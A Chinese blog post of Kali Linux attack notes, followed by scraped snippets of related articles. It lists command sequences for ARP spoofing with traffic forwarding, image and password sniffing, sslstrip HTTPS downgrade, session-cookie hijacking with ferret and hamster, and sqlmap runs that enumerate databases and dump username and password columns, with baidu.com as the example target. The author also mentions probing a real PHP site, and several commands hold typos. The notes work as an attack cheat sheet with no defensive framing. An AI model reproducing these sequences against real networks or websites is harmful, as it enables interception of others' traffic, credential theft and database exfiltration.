kali 局域网嗅探

1、局域网图片嗅探

工具  arpspoof

arpspoof -i eth0 -t 192.1681.10(网卡 目标地址) 192.168.1.1 局域网网关,如果在Windows中可以使用局域网扫描工具  Advanced ip Scanner

linux中 扫描局域网在线的主机 fping -asg 192.168.1.0/24

            
        欺骗的同时不能是对方断网,使用流量转发  echo 1 >/proc/sys/net/ipv4/ip_forward

检查是否成功执行     cat  proc/sys/sys/net/ipv4/ip_forward          
                     获取本机网卡的图片   driftnet -i eth0

2、密码嗅探 <http>

先使用欺骗命令 arpspoof

ettercap -Tq - i eth0

3、ssh远程连接操作  链接kali  shell模式注销

ctrl +Alt +F1   切换到 命令行模式

使用命令   /etc/init.d/ssh  start

使用Xshell 链接kali ip

4、抓包https流量

首先编辑    vim /etc/ettercap/etter.conf   修改  ****linux **  取消 #

开启 sslstrip -a -f -k

开启欺骗  arpspoof  同时转发流量

在https 网址上进行登陆 抓取流量

5、会话劫持登陆已经被别人登陆的网站

快速添加之前使用的命令  ! + 部分命令  就会补全

先使用arpspoof 欺骗 同时流量转发

使用 wireshark 流量抓包工具

使用 ferret 重新生成抓包的工具

ferret  -r  j加上 抓取的流量包  会生成一个 txt文件

使用 hamster  -h打开一个浏览器        -----》 设置代理和端口

或者不适用欺骗,直接使用 ferret -i eth0  然后使用 hamster  浏览网页

另外基于界面的软件 cookieCadger

6、sqlmap 对asp网站的检测

sqlmap -u "www.baidu.com.id=2"

sqlmap -u "www.baidu.com.id=2"   --tables

sqlmap -u "www.baidu.com.id=2"     --columns -T  "user"

sqlmap -u "www.baidu.com.id=2"  --dump  -C "username ,password" -T "user"

cookie使用     sqlmap -u “  www.baidu.com.php.id=2”   --cookie "id=23" --level=2

7、sqlmap 对php网站的检测

sqlmap -u “  www.baidu.com.php.id=2”  --is-dba   检测是否是dba 形式  (可以将文件写入目录)

sqlmap -u “  www.baidu.com.php.id=2”  --dbs   (列出所有的数据库)

sqlmap -u “  www.baidu.com.php.id=2”   --current-db     (猜测当前的数据库)

sqlmap -u “  www.baidu.com.php.id=2”  --tables -D "admin"   (根据admin数据库猜测表名)

sqlmap -u “  www.baidu.com.php.id=2”   --columns -T "pss"  -D "admin"

sqlmap -u “  www.baidu.com.php.id=2”  --dump  -C "username,password " -T "pss"  -D "admin"

8、实例检测

下面是我检测的一个网上的PHP的网站 存在SQL注入的漏洞

9、Metasploit

msfconsole

这一节我之前的微博已经写过很多,不过还没哟整理,想着抽空整理一遍

10、流量分析工具 nload

附: 卸载之前暗转的软件 apt-get remove

修复没有成功安装的软件   apt --fix-broken install

11、

原文地址:https://www.cnblogs.com/xinxianquan/p/9735720.html

时间: 2024-11-05 04:57:28

kali 局域网嗅探的相关文章

局域网嗅探原理及工具

嗅探只能发生在局域网,局域网内通信是通过MAC地址寻址的,通过IP寻址在发生在局域网间的. ARP协议,在计算机A中会发送ARP广播来寻找通讯对象计算机B的MAC地址,如果有个计算机C,冒充双方的IP,并且把自己的MAC发送给A 和 C,就可以实现数据包转发,继而实现嗅探或监听.这就是局域网嗅探的原理. ARP -a 可查看ARP表,ARP表中静态表比动态表优先级高,可通过ARP -s ip mac绑定静态表. 原理图

局域网嗅探程序

在LINUX系统环境下通过Raw Socket编程,设计实现局域网嗅探程序. 程序实例部分核心代码: #include <stdio.h> #include <string.h> #include <errno.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/ioctl.h> #include <net/if.h> #include <l

嗅探、中间人sql注入、反编译--例说桌面软件安全性问题

嗅探.中间人sql注入.反编译--例说桌面软件安全性问题 今天这篇文章不准备讲太多理论,讲我最近遇到的一个案例.从技术上讲,这个例子没什么高深的,还有一点狗屎运的成分,但是它又足够典型,典型到我可以讲出很多大道理用来装逼.So,我们开始吧. 1.1 一个公司内部专用的CRM系统 CRM系统是什么,如果你不知道的话,请自行Google.从数据的角度讲,它包含了一个公司所有往来客户的机密资料,如果泄露的话,后果很严重.下面是我无意中发现的一个网站,挂着一个CRM软件的下载链接.开始的时候我以为这个是

网站渗透工具大全

一. 基于网站的渗透 1.名称:Acunetix Web Vulnerability Scanner 6 功能:网站漏洞扫描器. 平台:Windows 2.名称:IBM Rational AppScan 7.8 功能:网站漏洞扫描器. 平台:Windows 3.名称:Jsky 功能:网站漏洞扫描器. 平台:Windows 4.名称:DTools 功能:阿D的多功能入侵工具,带扫描.植马等. 平台:Windows 5.名称:wepoff 功能:网站漏洞扫描器. 平台:Linux / Unix 6.

Cain工具ARP欺骗攻击

OS:Win7工具:Cainhttp://pan.baidu.com/s/1xq9lW 密码:409z 网络:本机和被攻击电脑有线连接路由器. Cain是有名的局域网嗅探工具,有丰富的功能.比如可以解密出保存在本地的Wifi密码. 下面尝试进行ARP欺骗.在设置中配置好网卡,在工具栏中开启嗅探和ARP.选中上方Sniffer选项卡,点击加号扫描局域网内的主机.  扫描出三个结果,第一个是我的TP-LINK路由器,第二个是被攻击电脑.第三个名为Apple的结果不知道是怎么回事,当时没有Apple设

2017-2018-2 20179215《网络攻防实践》第八周作业

<网络攻防实践> 第八周 学习总结 一.第八章教材内容总结 Linux 操作系统简介 Linux 系统特点: 兼容UNIX :API 兼容,管理命令和各种工具: 源码开放 支持各种硬件平台,支持多CPU Linux 平台上存在大量的应用软件,以及应 用开发工具 多种不同发行版: RedHat(RHEL,Fedora, CentOS, -),Ubuntu,Debian, - 2.Linux 操作系统: 不是微内核系统,但具有某些微内核特征 Intel 版本:i386 的保护模式,特权级 内核态(

Kali Linux Web 渗透测试视频教程—第十四课-arp欺骗、嗅探、dns欺骗、session劫持

Kali Linux Web 渗透测试视频教程—第十四课-arp欺骗.嗅探.dns欺骗.session劫持 文/玄魂 目录 Kali Linux Web 渗透测试—第十四课-arp欺骗.嗅探.dns欺骗.session劫持      1 关于嗅探.arp欺骗.会话劫持.............................................................. 1 视频教程地址:http://edu.51cto.com/course/course_id-1887.h

小白日记22:kali渗透测试之提权(二)--抓包嗅探

抓包嗅探 通过抓包嗅探目标机器的流量,发现账号密码. Windows系统 1.Wirehshark 2.Omnipeek 3.commview 4.Sniffpass 只会抓取识别传输密码的明文协议,并提取密码 Linux系统 1.Tcpdump 2.Wirehshark 3.Dsniff 类似Sniffpass,只抓取密码(明文协议),在kali下默认集成. 测试 打开ftp服务  #service pure-ftpd start 启动:dsniff -i eth0 在其他主机上连接ftp服务

局域网win7系统:虚拟机vmware kali 做端口映射

1.首先在vmware窗口点击“编辑”,选择“NAT 模式” 再进入"NAT 设置“>添加>设置 (这是虚拟机的设置) 192.168.0.100是我虚拟机的ip地址,在kali终端 可通过ifconfig查询 设置虚拟机外部端口8080映射到kali系统的8086端口 点击确认,虚拟机vmware的系统kali的端口映射就做好了. 2.设置win7系统打开8080端口. 控制面板>系统和安全>Windows防火墙>高级设置>入站规则(右键选择,新建入站规则&